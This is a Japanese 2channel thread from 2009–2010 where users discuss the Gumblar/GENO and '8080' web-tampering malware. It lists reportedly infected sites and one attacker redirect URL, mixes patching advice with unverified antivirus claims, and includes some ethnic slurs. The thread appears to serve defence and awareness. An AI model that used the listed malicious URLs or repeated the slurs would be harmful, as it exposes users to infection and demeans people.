Adobe Readerの設定の方からは有効無効を切り替えられなくなるだろうけど。
無駄な情報だったらゴメンこ 現在pixiv一般デイリー3位の人のサイト、踏むとウイルス検知されるみたいなので行かないように 他板のスレでGENOチェッカーで反応したというレスあったので一応念のため
GENOチェッカーとか未だに信じてる奴がいるなんて…
>>291 ああ、ずっとスレ見てなかったからそういうの知らんわスマンね
GENOチェッカーはともかく /*GNU GPL*/に感染してるな・・・ avast!のWebシールドも反応する
>>289 確かにHKCUからbEnableJSを削除してHKLMに作成した場合は
HKLMを見てくれるようだ。
でもHKCUとHKLMの両方にあって設定が異なる場合は
HKCUのが優先されるからやっぱりだめだ。
www.openspc2.org/reibun/Acrobat9/javascript/app/001/sample/sample.pdf
で動作確認。
295 :
名無しさん@お腹いっぱい。 :2009/12/26(土) 20:06:50
Adobe9.2の脆弱性って8や7には関係ないの?
297 :
名無しさん@お腹いっぱい。 :2009/12/26(土) 20:59:44
だめじゃね? 1年以上前にサポート終了してるから特に書いてないだけで。
もしサポート切れてる7使ってたら、その時点で今回の脆弱性云々の問題じゃないだろうねw
>>293 ついこの間、やんちゃにはっちゃけ暴走かましてくれた
avast!って正気に戻ったの?
>>300 いつの話だよ…。大きな誤検知騒ぎは速攻で修正されるわ。
ノートンだろうと何だろうと。
速攻じゃなかったろw
>>304 ↓ここをGoogleのキャッシュで見ると/*GNU GPL*/の記述があるな
ttp://www ●honda●co●jp/STREAM/safety/
そろそろ総合スレ立てたほうがいいかね?
GENOじゃねえだろ
308 :
306 :2009/12/27(日) 02:12:09
JR東日本と同じで8080系と区別がつかんのだろう
GENOにかかったっぽいのですが システムの復元でかかる以前の状態に戻せば クリーンインストールせずに済むのでしょうか?
>>309 このスレはクリーンインストール推奨
できれば安全なPCからパスワードも
変えたほうがいいくらい
自己責任でどうぞ
最近は8080系のほうが流行っているから
本当にGumblarかも分からないし
>>310 そうですか・・・
クリーンインストールをするということはCもDも
プログラムもファイルも全て消えて
PCを買った時の状態に戻るという認識でおkですか?
>>311 メーカー・パソコンのリカバリならそうなるかも
残せるかどうかはマニュアルをよく読むしかない
どちらにしても重要なデータはクリーンインストール前に
USBメモリなどにバックアップしておくのがいい
>>312 明日DVD−ROMでも買って大事なデータをバックアップ後クリーンインストールしてみます。
ありがとうございました。
あ、そのバックアップからまた感染という事態も起こりうるんでしょうか・・・?
>>313 ない、とはいいきれないが、実行ファイルでもない限り大丈夫だと思う
まあ念のため安全な環境から、バックアップデータをウイルススキャンするのもいいかも
315 :
名無しさん@お腹いっぱい。 :2009/12/27(日) 03:00:29
>>314 ありがとうございます。
消すのに惜しいプログラムも多少ありますので・・・
明日おっしゃるとおりにやってみます。
Gumblarが戦略的撤退中で8080系が活発に活動。それもゼロデイ突いてくるというおまけ付き
そろそろ総合スレの時期が来たか
スレタイ
>>206 辺りで良いんじゃないかと個人的には思うけど、GENOって文字含むかどうか難しいなぁ・・・
後テンプレで無駄な論争になるのもなんだかなぁ・・・
8080なんかで検索しねえだろ そんな名前で呼ぶやつなんて一人くらいだろうし
8080よりむしろGENOのがいらないと思うが
テンプレから無駄な論争に発展しそうな要素を排除すればいいだけだろ。 ブラウザのJavaScript関連なんてテンプレに書く必要ないと思うわ。
ウェブ改竄や脆弱性をついた攻撃であることが分かればいいだろ 8080なんてなんでいるんだよ それならGENOや/*GNU GPL*/や/*CODE1*/とかのがよっぽどいい こんなことで争うつもりはないが8080はないよ
スレタイでもうこんな状態かよw 総合スレなんてもうどうにでもな〜れ(AA略
固有名詞ならGumblar(ガンブラー)(系)表記が正しいけど、 GENOウィルスって名称は普通名詞だから、通称表記ならGENOウィルスだね。
タイトルなんて分かれば良いんだけどさ さすがにGENOは一番有名な呼び名だからいるだろ
だから GENO(系)ウィルススレ でいいんじゃね?
GENOには悪いが もはやGENOウイルスはウェブ改竄による脆弱性攻撃の総称になりつつあるな
このウィルスってVistaとWin7には無害なんでしょ?
これ感染するとどうなるの?
テンプレは用意してあるがブラウザのJavaScript関連は入れてない
セキュリティ・アップデートのみまとめてある
あとスレタイについては
【8080系ウイルスについて】
という簡単な説明を入れてあるので反対意見もあるが8080は入れたい
>>206 は残念ながら長すぎて入らないので現スレタイ案は
>>203 となっている
とりあえず正式名称と検索でGumblar/GENOは必要と思う
そうすると残りは/*GNU GPL*/と/*CODE1*/だが長くて入らないし
表記が変わるかもしれないので8080の総称を、と思うんだが・・・
>>328 テンプレ用意してあるんなら、このスレとは別に立てればいいじゃん。
このスレのスレタイは今後も GENOウイルススレ だよ。
332 :
名無しさん@お腹いっぱい。 :2009/12/27(日) 10:32:04
ノートンだと8080系で侵入防止が働く
>>318 まだ世の中ではGENOという呼称が一般的かと
>>332 たしかにノートンで侵入防止が働きました。
一安心?
ふと思ったけど、 これって、8080の外行きをブロックしちゃえばOKか? 意外に対策しやすいオチ?
みんながブロックしたら80にするだけだと思うんだ 8080はたぶん串
だから8080なんて呼ぶなよ 頭悪いだろ
GENOのが頭悪い
頭悪いは良いぎだが そう呼ぶ理由がない
実質そう読んでるのは一人だろ なぜか普及させようとしてるようだが
ポート8080を使う改竄は、海外メインで他にもあるらしいからなあ… って、これ以上は総合スレ出来た以上スレチか
GENOに感染してると100%わかるサイトチェッカーってある?
むしろ感染してたら迷惑なので、さっさとネットから切断して欲しいんだが
GIGAZINEが感染してる 注意せよ
注意喚起あげ
今見たけど見当たらないような
350 :
名無しさん@お腹いっぱい。 :2009/12/28(月) 00:46:20
Nortonセーフウェブでもgredでも異常なしだった。 どこが感染してるの?
GIGAZINEはAvastの誤検知のやつじゃねえの? ちゃんと確認したのかよ
>>347 PCニュースにスレ立てるとかGIGAZINEにメールとかはしたの?
ソース見たけどって・・またavastか
誤検出かどうかも確認しないで条件反射で騒ぎ立てる奴は消えろよ アホか
すまん… orz By avast
HTMLわからんのに感染てるって言い切るところがかっこいい
しがぬけたけどどうてもよかった
こんな短期間にまたも語検出暴発再発とは…。 さすがにこれでもうavast使うやつはいなくなるだろ。 これでまだ使うのはマゾか頭がイカれてるかどちらかだ。
スルーされて感染するよりか誤検出のほうがマシという考えもあるからね avast使い慣れてるし便利な機能もあるからサポートが切れるまでは乗り換えは眼中にないかな
361 :
名無しさん@お腹いっぱい。 :2009/12/28(月) 03:01:08
■カスペルスキー 初期設定が明らかにまずいから変更推奨。 GENOに特化しているがそれ以外は微妙。 癖があってアプリやwinupdate時に誤作動起こしたり勝手に削除される事あり。 ■マカフィー 御三家では地味な印象。 シンプルでそこそこ軽い部類だけど対応が甘く信頼しきれない。 ■ウィルスバスター ガチ重い。 無駄にリソース喰いで受けていないテストも多く検出能力は眉唾、過去に盛大なやらかし有。 ■ノートン 初期設定がまずいから要設定。常駐時は軽いがスキャンは遅い。 定義更新でたまにやらかしたりFIREFOX3.5xとの相性が微妙。 2010実装のSONAR2はGENO亜種などの未知のウィルスに対応しているが設定変えないと 強力な誤爆(=デフォルトだと強制削除)をくらう可能性ありで注意。 多機能でアドオンとインサイトなどの連携機能は優秀。 OSは安定性考えるならVista以降を推奨。 ■ESET 軽くて割とシンプル(機能面でちょっと物足りないかも)。 検出能力は普通か。過去に一度だけ盛大なやらかし有。 誰でも知ってる市販の有名どころを出してみたが、ぶっちゃけ、どこも一長一短ですな。
いきなりどうした?
男ならアンチウィルスもFWも必要ない! 常時ノーガードだ
esetなんて有名でもなんでもないが…またアレな人かw
この手のウイルス感染って やっぱりみんな管理者権限で普段から使ってるってこと?
だってじゃないと不便だし・・・ っていう層が大半だからだろ
DropMyRightsってソフトいいね マイクロソフト製だし(未サポートソフトだけど) 普段管理者権限で使ってるけどWEBアプリとかこれ通して起動したら そのアプリはユーザー権限に下げられる GENO対策にいいんじゃない?
そんなの使うやつなら もともとGENOなど感染しない
Vistaユーザになる
GENOじゃないけど 最近のパスワード流出はソフトの設定読み取るのもあるみたいだから 権限関係なかったりする
そもそもユーザー権限とか基本的には関係ないし。 単にアップデートを怠っている馬鹿が引っかかるだけだろ。
ユーザー権限関係ないっておかしくね? 感染PCシステムファイル変更されてるみたいだけど ユーザー権限でシステムに変更加えられるの?
>>373 だから「基本的には」だろ。
やるべきことさえきっちりやっておけばシステムファイルの変更なんてされないんだから。
これ感染したらどうなるの?
377 :
名無しさん@お腹いっぱい。 :2009/12/28(月) 17:44:32
378 :
名無しさん@お腹いっぱい。 :2009/12/28(月) 21:20:47
380 :
名無しさん@お腹いっぱい。 :2010/01/01(金) 02:32:55
ん?
381 :
某社シス管 :2010/01/01(金) 15:49:14
さて、年明け早々、Web改竄ウイルス対策を上に説明しないといけない。 うちは、被害が確認されていないけど。 これから、資料作るべか。 親会社のシステムの関係でAdobeのJavaScript切れないし、 ReaderもflashもJREも自動更新きってあるし、配布ツールないし、700台あるし、どないするべかな。 親会社からのウイルス対策案内は、「なめてんのか?」のかという内容だし(無許可のUSBメモリなど使うなとか勝手にソフト入れるなとか)だし。 はぁ〜・・orz
700台のハニーポットか…
tp://www●naito-akira●com/ 新型っぽい。
>>383 GNU GPLの8080。新型というほどでは…。飛び先は
salesforce-com.tinypic.com.gameztar-com.guidebat■ru:8080/rambler.ru/rambler.ru/corriere.it/adsrevenue.net/google.com/
//www●morozoff●co.jp/ ニュー速で何やら話題になっていたようだがこれは?
GNU GPLの8080。
387 :
名無しさん@お腹いっぱい。 :2010/01/04(月) 23:13:22
モロゾフ、アウト〜
504 名前: アスピレーター(アラバマ州)[sage] 投稿日:2010/01/05(火) 00:05:24.72 ID:9xzGeSng
感染してるやつ
プロセス見てみろ変なのが('A`)
516 名前: カッターナイフ(鹿児島県)[sage] 投稿日:2010/01/05(火) 00:08:10.60 ID:JBW7jlI0
>>504 ~TM108.tmp
こんな感じのやつ?
524 名前: アスピレーター(アラバマ州)[sage] 投稿日:2010/01/05(火) 00:10:12.00 ID:E7kbsyQA
>>516 そう
>>517 ログインしているユーザー名
systemにはいない
535 名前: アスピレーター(アラバマ州)[sage] 投稿日:2010/01/05(火) 00:12:24.54 ID:E7kbsyQA
うわあああああああああああああああああああああ
早速TELNETでユーザ名的確に打って総当たり攻撃キタ━━━━(°Д°)━━━━!!!!
ファイル抜かれるからIP変更するさらばあああああ
楽しそうだなw
Gumblarが読売の夕刊のトップ記事になってるね カタカナでガンブラーって凄い違和感があるけどw
釣りだろ
GENO(Gumblar)ウイルススレ ★24
ガンプラー
グーグルの急上昇ワードにガンブラーがw
癌ブラーは転移していくぞ
p://knnn4321●chips●jp/hpblog/p-18044●html かなりヤバい
avastたん入れるしかないのか
うん?
prototype.jsに仕込み
辻ちゃん、アウト〜
405 :
名無しさん@お腹いっぱい。 :2010/01/06(水) 01:32:24
今北さん用、GENO(Gumblar)ウイルス対処法。 行っておくべき事項を箇条書きにしました。 細かなことは他にもいろいろありますが、とりあえず以下を実施して下さい。 (1)Microsoft Update(Windows Update)を実行しシステムを最新の状態にする (2)Adobe Readerを最新版に更新する (3) Adobe ReaderのAcrobat JavaScriptを無効に設定 (4) JRE(Java Runtime Environment)を最新版に更新する (5) Flash Playerを最新版に更新する (6) QuickTimeを最新版に更新する (1)〜(4)を行っていれば、現時点で改ざんサイトを閲覧してもウイルスには感染しない。 攻撃コードは変化する可能性もあるので、念のため全て行っていただきたい。 Adobe Readerなどのアップデート方法については下記のトピックスを参照のこと。 Acrobat JavaScriptを無効にする方法は以下の通り。 (1)Adobe Readerを起動し[編集]メニューの[環境設定]を選択 (2)「分類」の中の「JavaScript」を選択 (3)「Acrobat JavaScriptを使用」のチェックをクリア (4)「OK」ボタンを押す
p://www●biwako●ne●jp/~kohsoku/home●html
ReaderとFlashはともかく、JREとQuick Timeは余程の事がない限り 入れない方が賢い
株や為替のチャートってJava使ってる業者が多いから使わざる得ない人も多いはず
409 :
名無しさん@お腹いっぱい。 :2010/01/06(水) 04:54:08
入れててもチェック外して使わないようにしてればいいがね
JREはシステムに喰いこみ過ぎでうざい
>>408 お絵描き掲示板がほぼJavaなので同人では多いかもね
zing-vn.google〜 のアドレスの中身(IP)がフランスに飛んだりドイツに飛んだりしてる?
今日の朝日新聞朝刊1面にガンブラーが載ってた。対策はウイルス対策ソフトを最新にすることだってさ。 abobe readerのことまで書けばいいのにね
415 :
名無しさん@お腹いっぱい。 :2010/01/06(水) 11:06:36
416 :
名無しさん@お腹いっぱい。 :2010/01/06(水) 12:02:23
>>30 コピー〜貼り付けでこれ使ってしまった俺は負け組か?
>>407 QuickTimeはどうしても必要な場合のみ一旦落としてから他のフォーマットに変換して見てるから特に困らない
JREはサブ機のみに入れて利用してる
419 :
名無しさん@お腹いっぱい。 :2010/01/06(水) 12:22:34
UACてなに〜? 教えてエロい人
>>414 >被害は計5社、改ざんされたサイトの閲覧者は延べ7万人を超す。
>(中略)
>ホンダはミニバン「ストリーム」のサイトが昨年12月18〜21日に改ざんされ、約5千人が閲覧した。
>JR東日本のHPは同月8〜22日に不正アクセスが繰り返され、プログラムが書き換えられた。
>23日に約17時間にわたって閉鎖して復旧したが、それまでの閲覧者は約5万人。
>
>信越放送のHPも同月26〜28日に改ざんされ、約5400人が閲覧した。
>ラジオ関西では同月15〜16日に特集サイトの「アニたまどっとコム」が改ざん、約6千人が閲覧した。
>洋菓子のモロゾフのHPは今月4〜5日に改ざん。「ガンブラーかどうかは調査中」とするが、この間に約3860人が閲覧した。
>>412 fast-fluxなんでね? 手駒に使える陥落サイトが腐るほどあるし。
そことは別の8080にdigしまくってみたけど1秒経たずにIP変わる。
422 :
名無しさん@お腹いっぱい。 :2010/01/06(水) 12:36:16
ユーザーアカウント制御のことだお。 それぐらいググレ厨房
424 :
名無しさん@お腹いっぱい。 :2010/01/06(水) 14:04:47
モロゾフをgoogleで検索したら、AVGツールバーは安全ですって緑のマークが検索結果横に付いているんだけど、もうこのサイトの脅威は去ったの? それともまだ訪問したらgumblarに感染するのかな?
>>381 つ Systems Management Server
428 :
名無しさん@お腹いっぱい。 :2010/01/06(水) 14:33:28
>>423 「30に引っかかって、パソコンのエロ動画が全部消えてしまいまいた」
って通報しますた。
429 :
名無しさん@お腹いっぱい。 :2010/01/06(水) 14:40:05
wwwwwwww
>>425 検索エンジンで未だに改ざんコードが埋まってるページを検索しても安全扱いされてそうな気がするんだけど、
そこら辺はどうなってる?
>>430 そこが自分も知りたいのですよ
今脅威のあるサイト名が分からないので試せないのですが、このツールバーがいったいどの程度の精度と安心・信頼感があるのかを試したくて
もし今脅威のサイトを検索して黄色とかになっていたら信用できるから自分は引っかかる可能性は低いと安心できるのですが・・・
そもそもAVGはモロゾフのやつ防げるのか? スクリプトも何もかも検出してるところは見たこと無いが
>>431 Bingで「"*/ try{window.onload"」で検索してみて
※リンク先には改ざんコードが埋まってるのでアクセスは絶対にしないように
多分改ざんには対応してない気がするんだけどな
動的サイトを作らなければOK
435 :
名無しさん@お腹いっぱい。 :2010/01/06(水) 16:00:37
>>430 www.hikky-country.net
ここのサイトは埋め込まれたまま1ヶ月くらい放置してたけど、google検索で安全の緑マークのままだった。
検索エンジンは、リアルタイムで、内容を反映するわけではないし、安全マークを「今現在」の判断の根拠にするのは無理があるのでは?
>>435 AVGツールバーの仕組みを理解してるか?
だからすくりぷと防げるとかにやっきになってないで ソフト更新しとけばオワリ してる?じゃあきにすんなオワリ
438 :
名無しさん@お腹いっぱい。 :2010/01/06(水) 17:17:12
フジテレビキタ━━━━━━(゚∀゚)━━━━━━!!!!
439 :
名無しさん@お腹いっぱい。 :2010/01/06(水) 17:40:25
>>435 今はどうなん?
対処したの?
俺のgoogle検索結果でもAVGは緑マークだけど
ってか、寧ろ逆にこのAVGが黄色とか注意してる検索結果サイトを知りたい
>>439 マジか?
ローソンもう対処うったのか分からんけれど例のAVGは緑チェック入ってるね
ってか、このウィルスっていったいどうやって各サイトに侵入してスクリプト埋め込んでるの?
俺Webサイト作るんだけど、対策どうすればいいのか分からないんだけど・・・
サーバサイド側のどこをどうしたらいいのかとか
馬鹿すぎプレイか1から読めよ
HTMLとCSSだけ使っとけばいいよ^^
>>30 最低だな、お前!
氏ねよ!
>>416 のようにやってしまった人間はアクセサリの復元しても駄目なん?
さっきTVでも、ローソンに「狙われる覚えは?」なんてアホな質問してたし 世間的にはこのウイルスもそういう認識が大方なんだろうなあ
p://hirayuonsen●or●jp/ ここも反応する。。
>446 森のほうはどう?
アンチウイルスソフトはどれがいいんだよ。 どのスレも荒れてて訳わからんわ。
カスペかアバスト
>>448 「Norton 360 Ver.3 2コニコPACK」がいいよ。
バスターしかないだろ
>>444 ムリだよ
こういう屑虫は逮捕された方が世の為だが、
税金で生かすにも勿体ないので死んで欲しいよね
>>439 はギコナビで見ても大丈夫?
見ようとしたらウイルスソフトが「だめーーー!」って言って見れなかったんだが…
Norton360は余計な糞機能が付きまくってるから論外 通常のNIS2010はOK バスターは無駄に重いがPCのスペックに余裕がある人は可
GENO専なら重いカスペか うちは3939NODだけどw バスターはありえない
カスペは誤爆ひどいぞ GENO以外じゃ使えたもんじゃない
アンチソフトなんか最後の最後の気休め それなりに知識あればウイルスなんかかからんし アホが変なサイト回ってればどれでも同じ
>>458 みたいな知的障害者を駆除するソフトが欲しいな
対応が遅れる場合あるしな ぶっちゃけ、各ソフトウェア&Winupdate>セキュリティソフト で、JS切るかアドオン制御で完全に予防できる この手のウィルスは無差別攻撃だから変なサイト、個人、法人関わらず平等に危険性があるからノーガード情弱はしねる
esetはマジ最悪だからやめとけ
>>463 去年だったか
FWの更新で数日程度、ネット接続できなくなる不具合をやらかしたんだっけ?
はいはい、ウイルスに感染してPCが壊れるよりは大分マシだろ FWくらいでいちいち騒ぐな
466 :
名無しさん@お腹いっぱい。 :2010/01/06(水) 20:17:55
>>464 うん。
「繋がんねーんだけど…」
キヤノン:「更新していただければ繋がります(キリッ」
「だから繋がんねーんだけど…」
こんな感じだったらしい。
この直後だと思うがFW以外にAV側も誤検知連続してたな。
またアホがぼくの「ういるすそふと」がスゴイ競争か よそでやれよ
お前のことだ雑音
470 :
454 :2010/01/06(水) 20:53:58
>>463 なぜ私のソフトがESETだとわかったw?
キムチ臭いから
本当にわからないんだけど、専ブラでみる分にはウイルス大丈夫なんじゃないの?
p://www●moffle●jp/ モッフルきますた
モッフルモッフル
>>470 誰もあんたとは言ってない件
最悪はVBだろjk
476 :
名無しさん@お腹いっぱい。 :2010/01/06(水) 21:11:27
世界最悪ソフトウイルスバスター伝説乙w
curl -s
http://www.moffle.jp/ | clamdscan -
stream: Trojan.JS-40 FOUND
----------- SCAN SUMMARY -----------
Infected files: 1
Time: 4.612 sec (0 m 4 s)
まあバスターの場合はクライアントをウイルス扱いするからね アップデートの度に他のDL停止とか常識であり得ないわ
直リンすんなよ在日
直リンクリックなぞ在日以下池沼でもしない
皆さ、どうやって感染したサイト見つけられるの?
在日以外、直リンしない 皆、●つけてるだろ
ばかばっか
また菓子屋か・・・ゴディバとかメリーチョコは無事かな?
今年もGENOウイルスが猛威を振るうのか
そうGENO。
早くも紅白出場決定だな・・・
>>446 GMOにそこの管理者へ連絡してもらったお。
>>448 ノートンが良い
avasは対応が早かったわけでもないのでt薦める意味は全くない
avastはフリーというのが利点
フリーならantivirのが対応は速かった ノートンの場合は脆弱性を利用した攻撃に対するIPSが優れてるので 新たな脆弱性を利用した攻撃が合ったとしても最初から対応できる可能性が高い
誤解を招かないように訂正 >新たな脆弱性を利用した攻撃 脆弱性を利用した新たな攻撃
avast!は誤検出しまくりのなかで対応したからな あんまり良い印象はない
順位 プログラム 検出数 検出率
#1 G Data 761,499 99.93%
#2 McAfee 761,431 99.92%
#3 Kaspersky 756,994 99.34%
#4 Symantec 756,734 99.31%
#5 K7 Computing 754,496 99.01%
#6 Microsoft 752,426 98.74%
#7 Eset Nod32 747,278 98.06%
#8 Trend Micro 741,606 97.32%
#9 AVG 737,980 96.84%
#10 Rising 696,220 91.36%
http://antivirus-news.net/2009/12/avtest12-g-data.html ほらよっ
>>494 マカフィー、あいかーらず地味で無難だな
そこが良くて使ってるが
hosts書き換えって対策にならない? ウイルスばら撒いてるアドレスを適当なサイトに飛ばせば感染しないよな?
G Dataじゃモロゾフのやつは初期の頃感染した そんな順位の話なんてしてないだろ 頭悪いやつはそれしか参考に出来ないんだろうけど
ランキングとか糞の役にもたたんだろ
アンチウイルスの優劣は荒れるから出来れば余所で 防御の点である程度は仕方ないだろうけど
>>500 みたいですね。
てっきりアドレスは一本でそこから色んなサーバーに繋がってるかと思ってました。
アップデートが一番の対策か。
>>473 トップページに貼られてるjsも2つともやられとるね。
企業でこれだけあるんだから個人のはもっとあるんだろうな
モッフル、京王電鉄、アウト〜
32 名前: すり鉢(アラバマ州) 投稿日: 2010/01/07(木) 00:45:39.79 ID:RXPRsCkB p://www●spacecraft●co●jp/home●html スペースクラフトグループ 神田うの、黒谷友香、栗山千明、岩田さゆり、青山倫子、宇浦冴香、等が所属。 ガンブラーキタ━(゚∀゚)━!!
>>455 必要の無い機能などは停止したり、カスタマイズ設定すればいいんだよ。
何でもデフォの状態や設定なままで、全てを使うことなんてナンセンス。
NIS 2010はまだ、特定の条件や環境で不具合があったりもするらしいぞ。
ぎゃー きのうローソン99の店舗探しにいってた はやくはっぴょうしろおy
PDFリーダをUSBメモリで隔離している俺に死角は無い
結局、このGumblarというウイルスは、フリーのソフトだとどれで防げるんですか? AVGとかAvastとかMicrosoftのやつとかありますけれど
>>511 >>1 もみれんのかお前は
あとただでさえ100%安全は保証できないのに亜種多すぎだから、
ただアンチウィルスソフトいれて安心するよりHDDのバックアップとかとっとけ
Gumblarって今一時撤退してるんじゃなかったっけ? タグが消えてるとかいう記事をどっかで見たが。 今は8080系とかいうやつじゃないの? 喪ッフルも見てきたがガンプラじゃなかった。 ガンプラと8080って別だよね?作者一緒とか? いろいろ混ざっててよくわからなくなってきた。
亜種が多すぎてよく分かってないんじゃないか?
ガンブラー自己中心派。
捕捉した。 tp://tollywoodb4u●com/sessions/22564●php
>>513 基本的に新聞社とかwebページが感染した企業はGumblarと8080の区別はしてなくて
両方ともガンブラーと言ってるというのが俺の認識
Gumblarが再始動してるなら尚更8080系とは区別すべきだよ
>>515 うおマジか。情報ありがとう。
>>520 だよな。
ブラウザ閲覧感染という特徴は一緒でも、感染後の挙動とか
全然違う別物なのにひとくくりにするから訳わからなくなる。
なんか豚インフルと季節性インフルみたいだ。
それを言ったらこのスレで8080の話題はスレ違いじゃないの?
インフルエンザもウイルスだね。ああおもしろいワロタ
タコとかイカとかはこれっぽっちも関係ないから。まじで。
は? タコとかGENOよりひどいぞ 画面真黒
ガンプラが再始動してるなら、8080とは区別して動向を追いたいから 全く分けてもらったほうがありがたい気がする。 どちらかが劇的な進化をとげたりした場合に「GENOで〜」「8080で〜」と 前置きがつかないとわからないような状況は面倒くさい。
531 :
名無しさん@お腹いっぱい。 :2010/01/07(木) 13:18:15
改鼠されたWebは交番に届けないのでしょうか? 保険が降りず何のうまみもないので笑い死にするのが普通なのでしょうか? 犯罪者は悪い人なので外事警察に捕まってほしいです
532 :
名無しさん@お腹いっぱい。 :2010/01/07(木) 13:25:21
>>530 そっちも見てるけど、GENO専スレのはずのここにも
8080感染サイトとかが貼られたりしてるから
どっちも総合みたいなことになっててややこしくね?w
電源入れるとランプは点灯して本体は起動してるっぽいんだけど 画面は真っ黒でマウスポインタも何も出ないんだが、これも感染? 取り合えず何回か強制終了で起動しなおしたら普通に画面が出たけど
頭悪いな
それをこのスレにコピペすれば・・
どんだけー
だって自分で調べるより、お前ら識者に聞いた方が早いじゃん。 でも最初から検索ワードに2ch入れてたのが悪かった。 JS/TrojanDownloader.Agent.NRLだけでググったら分かった。。。
ハウス食品もやられたって 有名企業がこんだけ被害にあってるってことは 個人サイトの被害の規模ってどんだけあるんだろうか;
企業のほうがセキュリティが上だと思うのは幻想
>>543 過去半年の閲覧ページのURLを抽出してみたら
40件が何らかのウィルスに感染していたようだ
js切ってるから全く気にしないがね
>>543 休み明けに騒ぎになるんじゃないのって危惧されてたけど
そうなってきたね。
16日?のアップデートがくれば騒ぎは収まるのだろうか?
今時、企業のHPなのにFTP使ってアップとかどうなのよって思うわ。
USBウイルスが常套化、「Gumblar」などWebからの脅威も続く p://internet.watch.impress.co.jp/docs/news/20100107_340954.html 仮想マシン上での動作デモ見たかったな
>>544 個人サイトやブログは、こまめに更新するから
そのときに管理人が改ざんなどに気づく機会がある。
554 :
名無しさん@お腹いっぱい。 :2010/01/07(木) 20:50:08
Gumblar感染してないか確認する方法は、GENOと同じ?
違うよ
>>555 最新のやつは
msconfigでスタートアップに次の2つが登録されてなければ感染はないと思う
タスクマネージャーで調べてどちらかが起動していてもまずい
C:\Documents and Settings\ユーザー名\スタート メニュー\プログラム\siszyd32.exe
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"sysgif32"="C:\\WINDOWS\\TEMP\\~TMD.tmp"
sysgif32で検索してヒットしなければ平気?
ガンブラー被害って採用ページとか多いけど エントリーフォームをつっつく→クロスサイトの一種なんじゃないの? 対策してないフォームが狙われているような気がする そもそもの報じられている「改ざん」の部分が FTP進入してソース書き換える基本的な不正アクセスなのか、 フォームや引数にスクリプト書き込んで、その状態のURLを表示させてぶっ壊す方式なのかどっち?
>>559 このスレの書き込み、全く読んでないよね?
>>557 すみませんパソコン初心者なんですがどうやって見れば良いか詳しく教えて頂けませんか?
あと、avastとゆうフリーソフト入れてるんですがちゃんと検知してくれますか?
>>559 不正アクセス
>>558 sysgif32の部分はレジストリね
siszyd32.exeと~TMD.tmpって言うファイルがなければ問題ない
ただ違った攻撃もあるからこれで完全に安心というわけではないけど
>>561 「ファイル名を指定して実行」かコマンドプロンプトにmsconfigと打ち込んでエンターキーを押す
[スタートアップ]って言うタブをクリックしてそう言う記述がないか確認
>>559 アホなWebデザイナーな管理者のマシンに感染してjsやhtmlにアレゲなコードを組み込んでいる
そして改竄されたことに気づかぬまま鯖にうp→閲覧した奴にウイルスをばらまく→∞
>>564 FTPのIDパスワード盗むんじゃないの?
>>561 avast!はスクリプトの検知はするのでサイトを見た時点で反応する
ウイルス本体にも反応するがwin.jpg、JavaGame.jar、ChangeLog.pdfなどの
脆弱性攻撃バイナリには反応しない
当然亜種が出ると分からないので、脆弱性持ちのソフトはアップデートして
使っているならAdobe ReaderのAcrobat Javascriptをオフにする
盗んでWEB自動更新
>>558 siszyd32.exeは検索しても見つからないよ
エクスプローラでも見えない
msconfigのスタートアップにあったらやばい
無効にしても復活する
セーフモードだとエクスプローラで見えるようになるのでそこで削除
>>564 管理者のマシンに感染してFTPアカウント情報を盗聴、
入手したFTPアカウントを悪用してサイトを改ざん
だから全然違うがな
>>563 詳しく教えて頂きありがとうございました
無かったようです、ひとまず安心して良いのかな?
>>566 そうなんですね!
ソフトを常に最新の状態にして、javaはオフにしときます
ありがとうございます
>>569 あら?違うのか
別のウイルスだったかもしれない
>>568 フォルダオプションで隠し属性のファイルも表示させるようにしていても見えないってこと?
>>572 ZwQueryDirectoryFile辺りをフックすればファイルを隠蔽できるはず
ファイルがあるのに見えないように・・・
>>572 うん
エクスプローラじゃないツールなら見えるのもある
消せないけど
8080は、FTPソフトを起動してなくても勝手に改ざんする。 ずっと放置してたサイトが感染後にがっつり改ざんされてたとの報告も。 PC起動している間はずっと改ざんを繰り返すみたいだよ。
ほう、けっこう原始的な改ざん方法なんだな。 てかあんな大手企業サイトが、ローカルPCから直接サーバーへ繋げるような 簡易なインフラ環境ってのがなんか意外だった。 もっと凄い構成組んでるとおもったけど。
>>530 の先のレス番99-110あたりに感染後の改ざん挙動報告があるよ
>>576 うーん直接管理してなくて委託にまかせっきりってイメージ持ってたけどなぁ
アンチウィルスソフト会社は流石に違うだろうけど
なんにせよごちゃごちゃ動きまくってるのは嫌だな
委託請け負ってる会社のPCがやられてるから 委託するような大手に被害が出てるのかもね
そう言うのがほとんどだろうね
委託請け負ってる所ってそんなにいい加減なのか? まあピンキリなのかもしれんがこうも大手企業のサイトが改ざんされると不安になるな
pdfでいろいろやりとりするのが多いからやられるのが多いのかもな
pdfのメッカ、官庁はいまんとこ無事みたいだね
pdfという形式自体を、これを機に廃れさせるべきなんじゃないだろうか 仕事で使うつっても仕事の能率とセキュリティ性なら後者が優先されるべきだし
自分はpdfあんま好きじゃないから消えてもらってもかまわないな
587 :
名無しさん@お腹いっぱい。 :2010/01/08(金) 13:27:12
JREはWindowsVista以降の保護モードに対応してるから、 IEで保護モードで使う設定にしてれば、やられてもごく限られた動作しかできず、 ほとんど影響をうけない firefoxとかchromeとか保護モード非対応の脆弱なブラウザは使ってないから知らん
でも脆弱性ついてきたら実行されちゃうんでしょ
保護モードなんてバイパス出来るのに・・・
結局きちんと対策してなくちゃ駄目なんだから OSやブラウザの種類云々は関係ないと思うが
もっと大騒ぎしてほしい mixiあたりヘマしないかなあ
いやあもっと騒がれたらセキュリティの意識高まるかもしれないじゃん?
Anti Windowsの俺が通りますよっと
599 :
名無しさん@お腹いっぱい。 :2010/01/08(金) 17:13:39
盛り上がってるなあ
とうとう警視庁も捜査に乗り出したしな 8080の犯人探すのかGENOの犯人探すのかよくわからんが できればどっちも見つけてほしいね
>>601 出た。
今朝の犬HKラジオでトップニュース。
>>597 ttp://msdn.microsoft.com/en-us/library/bb250462 (VS.85).aspx
日本語訳もあるけど、UACが旧名称のUAPになってたり機械翻訳みたいだったり基本的にやる気なし。
UACとかユーザーインターフェースの特権分離(UIPI)とかいう仕組みでIEが制限されたモードで実行され、
悪意のあるコードがWindowsに影響を与えるのを防ぐ仕組みが保護モードなのかな。
UACに依存している機能だから例によってUACを無効にしてると機能しない。また、UACが動作していてもIEを管理者で
起動すると保護モードは無効になる。
へー、とうとう警視庁が動くのか 犯人見つかればいいけど捕まえるのは難しいだろうな
>>604 そもそも犯人って何人なんだ?
